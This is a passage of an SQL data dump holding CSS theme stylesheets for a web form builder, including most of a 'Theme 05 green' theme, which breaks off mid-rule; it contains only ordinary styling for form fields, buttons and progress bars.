text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/01/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/01/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/01/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/01/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/01/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #A0CBDB;\r\n	padding:15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 0px;\r\n	background: #006A91;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: " ";\r\n	position: relative;\r\n	width: 97.7%;\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\ncolor: #3F3F3F;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #026994;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #026994;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #026994;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #006A91;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #01B4F6;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #018ABE;\r\n	background: -moz-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0079A6), color-stop(39%, #018ABE ), color-stop(100%, #00B6FA ));\r\n	background: -webkit-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: -o-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: -ms-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: linear-gradient(to right, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #C4D5DF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}', 0),
(18, 'Theme 05 green', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #007326;\r\nborder: 1px solid #B6E4CF;\r\nmargin-bottom: 10px;\r\ncolor: #B6E4CF;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/02/nextbg_hover.png) url([SITE_ROOT]/images/05/02/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/02/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/02/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/02/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/02/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/02/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #B6E4CF;\r\n	padding: 15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 0px;\r\n	background: #0D7A31;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: " ";\r\n	position: relative;\r\n	width: 97.7%;\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n}\r\n\r\n.wdform_section_break{\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0D7A31;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0D7A31;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #0D7A31;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: 